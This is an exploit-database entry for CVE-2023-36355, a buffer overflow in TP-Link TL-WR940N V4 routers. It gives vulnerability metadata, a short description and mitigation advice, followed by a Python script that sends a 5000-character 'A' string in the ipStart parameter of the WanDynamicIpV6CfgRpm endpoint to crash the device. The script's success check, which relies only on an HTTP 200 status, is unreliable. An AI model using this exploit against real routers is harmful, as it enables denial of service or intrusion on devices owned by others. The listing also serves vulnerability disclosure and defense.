TP-Link TL-WR940N V4 - Buffer OverFlow

vendor:

TP-Link TL-WR940N

by:

Amirhossein Bahramizadeh

9.9

CVSS

CRITICAL

Buffer Overflow

119

CWE

Product Name: TP-Link TL-WR940N

Affected Version From: TP-Link TL-WR940N V4

Affected Version To: TP-Link TL-WR940N V4

Patch Exists: NO

Related CWE: CVE-2023-36355

CPE: o:tp-link:tl-wr940n_firmware

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux

2023

TP-Link TL-WR940N V4 – Buffer OverFlow

This exploit triggers a buffer overflow vulnerability in TP-Link TL-WR940N V4 routers. By sending a crafted payload to the vulnerable endpoint, an attacker can cause a buffer overflow, potentially leading to remote code execution or denial of service. The vulnerability is identified by CVE-2023-36355.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware of the TP-Link TL-WR940N V4 router to the latest version provided by the vendor. Additionally, it is advised to restrict access to the router's administration interface only to trusted networks and regularly monitor for any unusual activity.

Source

Exploit-DB raw data:

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000  # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
    print('Buffer overflow triggered successfully')
else:
    print('Buffer overflow not triggered')